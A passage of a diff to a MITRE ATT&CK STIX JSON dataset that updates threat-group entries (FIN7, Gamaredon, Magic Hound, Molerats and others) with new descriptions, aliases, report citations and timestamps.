+ "description": "Golovanov, S. (2018, December 6). DarkVishnya: Banks attacked through direct connection to local network. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[DarkVishnya](https://attack.mitre.org/groups/G0105) is a financially motivated threat actor targeting financial institutions in Eastern Europe. In 2017-2018 the group attacked at least 8 banks in this region.(Citation: Securelist DarkVishnya Dec 2018)",
+ "name": "DarkVishnya",
+ "type": "intrusion-set",
+ "id": "intrusion-set--813636db-3939-4a45-bea9-6113e970c029",
+ "aliases": [
+ "DarkVishnya"
+ ],
+ "modified": "2020-05-15T15:08:55.062Z",
+ "created": "2020-05-15T13:07:26.651Z",
+ "x_mitre_version": "1.0"
+ },
{
"type": "intrusion-set",
"id": "intrusion-set--9e729a7e-0dd6-4097-95bf-db8d64911383",
@@ -187110,7 +215074,7 @@
"url": "https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/"
},
{
- "url": "https://www.emc.com/collateral/white-papers/h12756-wp-shell-crew.pdf",
+ "url": "https://www.rsa.com/content/dam/en/white-paper/rsa-incident-response-emerging-threat-profile-shell-crew.pdf",
"description": "RSA Incident Response. (2014, January). RSA Incident Response Emerging Threat Profile: Shell Crew. Retrieved January 14, 2016.",
"source_name": "RSA Shell Crew"
},
@@ -187141,12 +215105,12 @@
"PinkPanther",
"Black Vine"
],
- "modified": "2020-03-30T18:57:39.836Z",
+ "modified": "2020-04-17T21:11:30.305Z",
"created": "2017-05-31T21:31:49.412Z",
+ "x_mitre_version": "1.2",
"x_mitre_contributors": [
"Andrew Smith, @jakx_"
- ],
- "x_mitre_version": "1.2"
+ ]
},
{
"type": "intrusion-set",
@@ -187366,10 +215330,10 @@
],
"modified": "2020-03-30T18:58:36.955Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
"x_mitre_contributors": [
"Valerii Marchuk, Cybersecurity Help s.r.o."
- ]
+ ],
+ "x_mitre_version": "1.1"
},
{
"type": "intrusion-set",
@@ -187399,7 +215363,7 @@
"aliases": [
"Equation"
],
- "modified": "2020-03-30T18:59:31.800Z",
+ "modified": "2020-06-29T01:39:22.044Z",
"created": "2017-05-31T21:31:54.697Z",
"x_mitre_version": "1.2"
},
@@ -187473,7 +215437,7 @@
"aliases": [
"FIN4"
],
- "modified": "2020-03-30T19:00:39.460Z",
+ "modified": "2020-06-23T19:52:35.625Z",
"created": "2019-01-31T02:01:45.129Z",
"x_mitre_version": "1.1"
},
@@ -187517,10 +215481,10 @@
],
"modified": "2020-03-19T22:54:59.268Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
"x_mitre_contributors": [
"Walker Johnson"
- ]
+ ],
+ "x_mitre_version": "1.1"
},
{
"type": "intrusion-set",
@@ -187556,23 +215520,31 @@
"source_name": "FireEye FIN6 Apr 2019"
},
{
- "source_name": "Security Intelligence More Eggs Aug 2019",
+ "description": "Villadsen, O.. (2019, August 29). More_eggs, Anyone? Threat Actor ITG08 Strikes Again. Retrieved September 16, 2019.",
"url": "https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/",
- "description": "Villadsen, O.. (2019, August 29). More_eggs, Anyone? Threat Actor ITG08 Strikes Again. Retrieved September 16, 2019."
+ "source_name": "Security Intelligence More Eggs Aug 2019"
}
],
"aliases": [
"FIN6",
"ITG08"
],
- "modified": "2020-03-30T02:14:10.455Z",
+ "modified": "2020-05-15T19:15:35.233Z",
"created": "2017-05-31T21:32:06.015Z",
- "x_mitre_version": "2.1",
"x_mitre_contributors": [
"Drew Church, Splunk"
- ]
+ ],
+ "x_mitre_version": "2.1"
},
{
+ "type": "intrusion-set",
+ "id": "intrusion-set--3753cc21-2dae-4dfb-8481-d004e74502cc",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "FIN7",
+ "description": "[FIN7](https://attack.mitre.org/groups/G0046) is a financially-motivated threat group that has primarily targeted the U.S. retail, restaurant, and hospitality sectors since mid-2015. They often use point-of-sale malware. A portion of [FIN7](https://attack.mitre.org/groups/G0046) was run out of a front company called Combi Security. [FIN7](https://attack.mitre.org/groups/G0046) is sometimes referred to as [Carbanak](https://attack.mitre.org/groups/G0008) Group, but these appear to be two groups using the same [Carbanak](https://attack.mitre.org/software/S0030) malware and are therefore tracked separately. (Citation: FireEye FIN7 March 2017) (Citation: FireEye FIN7 April 2017) (Citation: FireEye CARBANAK June 2017) (Citation: FireEye FIN7 Aug 2018)",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -187584,24 +215556,24 @@
"description": "(Citation: FireEye FIN7 March 2017) (Citation: FireEye FIN7 April 2017) (Citation: Morphisec FIN7 June 2017) (Citation: FireEye FIN7 Shim Databases) (Citation: FireEye FIN7 Aug 2018)"
},
{
- "url": "https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html",
+ "source_name": "FireEye FIN7 March 2017",
"description": "Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017.",
- "source_name": "FireEye FIN7 March 2017"
+ "url": "https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html"
},
{
- "source_name": "FireEye FIN7 April 2017",
+ "url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html",
"description": "Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.",
- "url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html"
+ "source_name": "FireEye FIN7 April 2017"
},
{
- "url": "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html",
+ "source_name": "FireEye CARBANAK June 2017",
"description": "Bennett, J., Vengerik, B. (2017, June 12). Behind the CARBANAK Backdoor. Retrieved June 11, 2018.",
- "source_name": "FireEye CARBANAK June 2017"
+ "url": "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html"
},
{
- "source_name": "FireEye FIN7 Aug 2018",
+ "url": "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html",
"description": "Carr, N., et al. (2018, August 01). On the Hunt for FIN7: Pursuing an Enigmatic and Evasive Global Criminal Operation. Retrieved August 23, 2018.",
- "url": "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+ "source_name": "FireEye FIN7 Aug 2018"
},
{
"source_name": "Morphisec FIN7 June 2017",
@@ -187614,18 +215586,10 @@
"url": "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "description": "[FIN7](https://attack.mitre.org/groups/G0046) is a financially-motivated threat group that has primarily targeted the U.S. retail, restaurant, and hospitality sectors since mid-2015. They often use point-of-sale malware. A portion of [FIN7](https://attack.mitre.org/groups/G0046) was run out of a front company called Combi Security. [FIN7](https://attack.mitre.org/groups/G0046) is sometimes referred to as [Carbanak](https://attack.mitre.org/groups/G0008) Group, but these appear to be two groups using the same [Carbanak](https://attack.mitre.org/software/S0030) malware and are therefore tracked separately. (Citation: FireEye FIN7 March 2017) (Citation: FireEye FIN7 April 2017) (Citation: FireEye CARBANAK June 2017) (Citation: FireEye FIN7 Aug 2018)",
- "name": "FIN7",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "id": "intrusion-set--3753cc21-2dae-4dfb-8481-d004e74502cc",
- "type": "intrusion-set",
"aliases": [
"FIN7"
],
- "modified": "2020-03-30T19:36:27.792Z",
+ "modified": "2020-06-24T19:07:46.524Z",
"created": "2017-05-31T21:32:09.460Z",
"x_mitre_version": "1.4"
},
@@ -187666,6 +215630,34 @@
"created": "2018-04-18T17:59:24.739Z",
"x_mitre_version": "1.1"
},
+ {
+ "id": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "type": "intrusion-set",
+ "name": "Frankenstein",
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) is a campaign carried out between January and April 2019 by unknown threat actors. The campaign name comes from the actors' ability to piece together several unrelated components.(Citation: Talos Frankenstein June 2019) ",
+ "external_references": [
+ {
+ "external_id": "G0101",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/groups/G0101"
+ },
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "aliases": [
+ "Frankenstein"
+ ],
+ "modified": "2020-05-28T00:01:09.384Z",
+ "created": "2020-05-11T15:21:09.438Z",
+ "x_mitre_version": "1.0"
+ },
{
"type": "intrusion-set",
"id": "intrusion-set--0ea72cd5-ca30-46ba-bc04-378f701c658f",
@@ -187731,14 +215723,6 @@
"x_mitre_version": "1.1"
},
{
- "type": "intrusion-set",
- "id": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Gamaredon Group",
- "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) is a threat group that has been active since at least 2013 and has targeted individuals likely involved in the Ukrainian government. (Citation: Palo Alto Gamaredon Feb 2017)",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -187750,16 +215734,37 @@
"description": "(Citation: Palo Alto Gamaredon Feb 2017)"
},
{
- "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
- "source_name": "Palo Alto Gamaredon Feb 2017"
+ "source_name": "Palo Alto Gamaredon Feb 2017",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
+ },
+ {
+ "source_name": "TrendMicro Gamaredon April 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/",
+ "description": "Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020."
+ },
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
}
],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) is a threat group that has been active since at least 2013 and has targeted individuals likely involved in the Ukrainian government. The name [Gamaredon Group](https://attack.mitre.org/groups/G0047) comes from a misspelling of the word \"Armageddon\", which was detected in the adversary's early campaigns.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)",
+ "name": "Gamaredon Group",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "id": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "type": "intrusion-set",
"aliases": [
"Gamaredon Group"
],
- "modified": "2020-03-30T19:05:56.589Z",
+ "modified": "2020-06-25T20:56:02.454Z",
"created": "2017-05-31T21:32:09.849Z",
+ "x_mitre_contributors": [
+ "Trend Micro Incorporated"
+ ],
"x_mitre_version": "1.1"
},
{
@@ -187838,7 +215843,7 @@
"description": "(Citation: McAfee Honeybee)"
},
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
@@ -187854,10 +215859,65 @@
"aliases": [
"Honeybee"
],
- "modified": "2020-03-30T02:17:35.560Z",
+ "modified": "2020-04-16T19:41:40.359Z",
"created": "2018-10-17T00:14:20.652Z",
"x_mitre_version": "1.1"
},
+ {
+ "id": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "type": "intrusion-set",
+ "name": "Inception",
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) is a cyber espionage group active since at least 2014. The group has targeted multiple industries and governmental entities primarily in Russia, but has also been active in the United States and throughout Europe, Asia, Africa, and the Middle East.(Citation: Unit 42 Inception November 2018)(Citation: Symantec Inception Framework March 2018)(Citation: Kaspersky Cloud Atlas December 2014)",
+ "external_references": [
+ {
+ "external_id": "G0100",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/groups/G0100"
+ },
+ {
+ "source_name": "Inception",
+ "description": "(Citation: Symantec Inception Framework March 2018)"
+ },
+ {
+ "source_name": "Inception Framework",
+ "description": "(Citation: Symantec Inception Framework March 2018)"
+ },
+ {
+ "source_name": "Cloud Atlas",
+ "description": "(Citation: Kaspersky Cloud Atlas December 2014)"
+ },
+ {
+ "source_name": "Unit 42 Inception November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020."
+ },
+ {
+ "source_name": "Symantec Inception Framework March 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies",
+ "description": "Symantec. (2018, March 14). Inception Framework: Alive and Well, and Hiding Behind Proxies. Retrieved May 8, 2020."
+ },
+ {
+ "source_name": "Kaspersky Cloud Atlas December 2014",
+ "url": "https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/",
+ "description": "GReAT. (2014, December 10). Cloud Atlas: RedOctober APT is back in style. Retrieved May 8, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "aliases": [
+ "Inception",
+ "Inception Framework",
+ "Cloud Atlas"
+ ],
+ "modified": "2020-05-20T20:54:12.685Z",
+ "created": "2020-05-08T17:01:04.058Z",
+ "x_mitre_contributors": [
+ "Oleg Skulkin, Group-IB"
+ ],
+ "x_mitre_version": "1.0"
+ },
{
"type": "intrusion-set",
"id": "intrusion-set--6713ab67-e25b-49cc-808d-2b36d4fbc35c",
@@ -187926,9 +215986,9 @@
"Playful Dragon",
"RoyalAPT"
],
- "modified": "2020-03-30T02:22:29.963Z",
+ "modified": "2020-05-07T18:49:43.973Z",
"created": "2017-05-31T21:31:47.177Z",
- "x_mitre_version": "1.2"
+ "x_mitre_version": "1.3"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -188018,9 +216078,9 @@
"description": "(Citation: Secureworks NICKEL ACADEMY Dec 2017)"
},
{
- "source_name": "US-CERT HIDDEN COBRA June 2017",
+ "url": "https://www.us-cert.gov/ncas/alerts/TA17-164A",
"description": "US-CERT. (2017, June 13). Alert (TA17-164A) HIDDEN COBRA \u2013 North Korea\u2019s DDoS Botnet Infrastructure. Retrieved July 13, 2017.",
- "url": "https://www.us-cert.gov/ncas/alerts/TA17-164A"
+ "source_name": "US-CERT HIDDEN COBRA June 2017"
},
{
"url": "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf",
@@ -188033,9 +216093,9 @@
"url": "https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/"
},
{
- "source_name": "Kaspersky Lazarus Under The Hood Blog 2017",
+ "description": "GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April 17, 2019.",
"url": "https://securelist.com/lazarus-under-the-hood/77908/",
- "description": "GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April 17, 2019."
+ "source_name": "Kaspersky Lazarus Under The Hood Blog 2017"
},
{
"source_name": "US-CERT HOPLIGHT Apr 2019",
@@ -188060,7 +216120,7 @@
"ZINC",
"NICKEL ACADEMY"
],
- "modified": "2020-03-30T19:55:05.707Z",
+ "modified": "2020-05-06T19:32:13.572Z",
"created": "2017-05-31T21:32:03.807Z",
"x_mitre_version": "1.3"
},
@@ -188102,7 +216162,7 @@
"Leafminer",
"Raspite"
],
- "modified": "2020-03-27T00:11:12.202Z",
+ "modified": "2020-06-23T19:56:50.005Z",
"created": "2018-10-17T00:14:20.652Z",
"x_mitre_version": "2.2"
},
@@ -188161,10 +216221,10 @@
],
"modified": "2020-03-30T01:06:24.797Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "2.1",
"x_mitre_contributors": [
"Valerii Marchuk, Cybersecurity Help s.r.o."
- ]
+ ],
+ "x_mitre_version": "2.1"
},
{
"type": "intrusion-set",
@@ -188278,12 +216338,20 @@
],
"modified": "2020-03-28T21:28:33.395Z",
"created": "2019-09-13T12:37:10.394Z",
+ "x_mitre_version": "1.1",
"x_mitre_contributors": [
"Matias Nicolas Porolli, ESET"
- ],
- "x_mitre_version": "1.1"
+ ]
},
{
+ "type": "intrusion-set",
+ "id": "intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Magic Hound",
+ "description": "[Magic Hound](https://attack.mitre.org/groups/G0059) is an Iranian-sponsored threat group that conducts long term, resource-intensive operations to collect intelligence, dating back as early as 2014. The group typically targets U.S. and the Middle Eastern military, as well as other organizations with government personnel, via complex social engineering campaigns.(Citation: FireEye APT35 2018)",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -188295,78 +216363,80 @@
"description": "(Citation: Unit 42 Magic Hound Feb 2017)"
},
{
- "source_name": "Rocket Kitten",
- "description": "Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the adversary group Rocket Kitten. (Citation: Unit 42 Magic Hound Feb 2017) (Citation: ClearSky Charming Kitten Dec 2017)"
- },
- {
- "source_name": "Operation Saffron Rose",
- "description": "Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the campaign Operation Saffron Rose. (Citation: Unit 42 Magic Hound Feb 2017)"
- },
- {
- "source_name": "Ajax Security Team",
- "description": "Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the group Ajax Security Team. (Citation: Unit 42 Magic Hound Feb 2017)"
+ "source_name": "Cobalt Gypsy",
+ "description": "Based on overlapping hash values in reporting, Magic Hound activity appears to overlap with activity conducted by the group known as Cobalt Gypsy.(Citation: Secureworks Cobalt Gypsy Feb 2017)"
},
{
"source_name": "Operation Woolen-Goldfish",
- "description": "Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the campaign Operation Woolen-Goldfish. (Citation: Unit 42 Magic Hound Feb 2017)"
+ "description": "Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the campaign Operation Woolen-Goldfish.(Citation: Unit 42 Magic Hound Feb 2017)"
+ },
+ {
+ "source_name": "Ajax Security Team",
+ "description": "Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the group Ajax Security Team.(Citation: Unit 42 Magic Hound Feb 2017)"
+ },
+ {
+ "source_name": "Operation Saffron Rose",
+ "description": "Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the campaign Operation Saffron Rose.(Citation: Unit 42 Magic Hound Feb 2017)"
+ },
+ {
+ "source_name": "Rocket Kitten",
+ "description": "Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the adversary group Rocket Kitten.(Citation: Unit 42 Magic Hound Feb 2017)(Citation: ClearSky Charming Kitten Dec 2017)"
+ },
+ {
+ "source_name": "Phosphorus",
+ "description": "(Citation: Microsoft Phosphorus Mar 2019)"
},
{
"source_name": "Newscaster",
- "description": "Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the older attack campaign called Newscaster (aka Newscasters). (Citation: Unit 42 Magic Hound Feb 2017) (Citation: FireEye APT35 2018)"
- },
- {
- "source_name": "Cobalt Gypsy",
- "description": "Based on overlapping hash values in reporting, Magic Hound activity appears to overlap with activity conducted by the group known as Cobalt Gypsy. (Citation: Secureworks Cobalt Gypsy Feb 2017)"
+ "description": "Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the older attack campaign called Newscaster (aka Newscasters).(Citation: Unit 42 Magic Hound Feb 2017)(Citation: FireEye APT35 2018)"
},
{
"source_name": "APT35",
"description": "(Citation: FireEye APT35 2018)"
},
- {
- "source_name": "Unit 42 Magic Hound Feb 2017",
- "description": "Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017.",
- "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/"
- },
{
"source_name": "FireEye APT35 2018",
"description": "Mandiant. (2018). Mandiant M-Trends 2018. Retrieved July 9, 2018.",
"url": "https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf"
},
+ {
+ "source_name": "Unit 42 Magic Hound Feb 2017",
+ "description": "Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017.",
+ "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/"
+ },
+ {
+ "source_name": "Secureworks Cobalt Gypsy Feb 2017",
+ "description": "Counter Threat Unit Research Team. (2017, February 15). Iranian PupyRAT Bites Middle Eastern Organizations. Retrieved December 27, 2017.",
+ "url": "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations"
+ },
{
"source_name": "ClearSky Charming Kitten Dec 2017",
"description": "ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017.",
"url": "http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf"
},
{
- "url": "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations",
- "description": "Counter Threat Unit Research Team. (2017, February 15). Iranian PupyRAT Bites Middle Eastern Organizations. Retrieved December 27, 2017.",
- "source_name": "Secureworks Cobalt Gypsy Feb 2017"
+ "source_name": "Microsoft Phosphorus Mar 2019",
+ "url": "https://blogs.microsoft.com/on-the-issues/2019/03/27/new-steps-to-protect-customers-from-hacking/",
+ "description": "Burt, T.. (2019, March 27). New steps to protect customers from hacking. Retrieved May 27, 2020."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "description": "[Magic Hound](https://attack.mitre.org/groups/G0059) is an Iranian-sponsored threat group operating primarily in the Middle East that dates back as early as 2014. The group behind the campaign has primarily targeted organizations in the energy, government, and technology sectors that are either based or have business interests in Saudi Arabia.(Citation: Unit 42 Magic Hound Feb 2017)(Citation: FireEye APT35 2018)",
- "name": "Magic Hound",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "id": "intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13",
- "type": "intrusion-set",
"aliases": [
"Magic Hound",
- "Rocket Kitten",
- "Operation Saffron Rose",
- "Ajax Security Team",
- "Operation Woolen-Goldfish",
- "Newscaster",
"Cobalt Gypsy",
+ "Operation Woolen-Goldfish",
+ "Ajax Security Team",
+ "Operation Saffron Rose",
+ "Rocket Kitten",
+ "Phosphorus",
+ "Newscaster",
"APT35"
],
- "modified": "2020-03-30T20:57:00.818Z",
+ "modified": "2020-07-04T23:30:03.871Z",
"created": "2018-01-16T16:13:52.465Z",
"x_mitre_contributors": [
"Bryan Lee"
],
- "x_mitre_version": "1.2"
+ "x_mitre_version": "2.0"
},
{
"type": "intrusion-set",
@@ -188401,14 +216471,41 @@
"x_mitre_version": "1.1"
},
{
+ "id": "intrusion-set--88489675-d216-4884-a98f-49a89fcc1643",
"type": "intrusion-set",
- "id": "intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Molerats",
- "description": "[Molerats](https://attack.mitre.org/groups/G0021) is a politically-motivated threat group that has been operating since 2012. The group's victims have primarily been in the Middle East, Europe, and the United States. (Citation: DustySky) (Citation: DustySky2)",
+ "name": "Mofang",
+ "description": "[Mofang](https://attack.mitre.org/groups/G0103) is a likely China-based cyber espionage group, named for its frequent practice of imitating a victim's infrastructure. This adversary has been observed since at least May 2012 conducting focused attacks against government and critical infrastructure in Myanmar, as well as several other countries and sectors including military, automobile, and weapons industries.(Citation: FOX-IT May 2016 Mofang)",
+ "external_references": [
+ {
+ "external_id": "G0103",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/groups/G0103"
+ },
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "aliases": [
+ "Mofang"
+ ],
+ "modified": "2020-05-29T03:30:39.739Z",
+ "created": "2020-05-12T21:23:59.021Z",
+ "x_mitre_version": "1.0"
+ },
+ {
+ "created": "2017-05-31T21:31:55.093Z",
+ "modified": "2020-07-01T22:11:04.389Z",
+ "aliases": [
+ "Molerats",
+ "Operation Molerats",
+ "Gaza Cybergang"
+ ],
"external_references": [
{
"external_id": "G0021",
@@ -188425,17 +216522,21 @@
},
{
"source_name": "Gaza Cybergang",
- "description": "(Citation: DustySky)"
+ "description": "(Citation: DustySky)(Citation: Kaspersky MoleRATs April 2019)"
},
{
- "url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf",
"source_name": "DustySky",
"description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016."
},
{
- "source_name": "DustySky2",
+ "url": "http://www.clearskysec.com/wp-content/uploads/2016/06/Operation-DustySky2_-6.2016_TLP_White.pdf",
"description": "ClearSky Cybersecurity. (2016, June 9). Operation DustySky - Part 2. Retrieved August 3, 2016.",
- "url": "http://www.clearskysec.com/wp-content/uploads/2016/06/Operation-DustySky2_-6.2016_TLP_White.pdf"
+ "source_name": "DustySky2"
+ },
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
},
{
"source_name": "FireEye Operation Molerats",
@@ -188443,21 +216544,29 @@
"url": "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html"
}
],
- "aliases": [
- "Molerats",
- "Operation Molerats",
- "Gaza Cybergang"
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "modified": "2020-03-30T19:10:28.674Z",
- "created": "2017-05-31T21:31:55.093Z",
+ "description": "[Molerats](https://attack.mitre.org/groups/G0021) is a politically-motivated threat group that has been operating since 2012. The group's victims have primarily been in the Middle East, Europe, and the United States. (Citation: DustySky) (Citation: DustySky2)(Citation: Kaspersky MoleRATs April 2019)",
+ "name": "Molerats",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "id": "intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411",
+ "type": "intrusion-set",
"x_mitre_version": "1.1"
},
{
+ "created": "2018-04-18T17:59:24.739Z",
+ "modified": "2020-05-29T01:24:36.860Z",
+ "aliases": [
+ "MuddyWater",
+ "Seedworm",
+ "TEMP.Zagros"
+ ],
"type": "intrusion-set",
"id": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "MuddyWater",
- "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) is an Iranian threat group that has primarily targeted Middle Eastern nations, and has also targeted European and North American nations. The group's victims are mainly in the telecommunications, government (IT services), and oil sectors. Activity from this group was previously linked to [FIN7](https://attack.mitre.org/groups/G0046), but the group is believed to be a distinct group possibly motivated by espionage.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)",
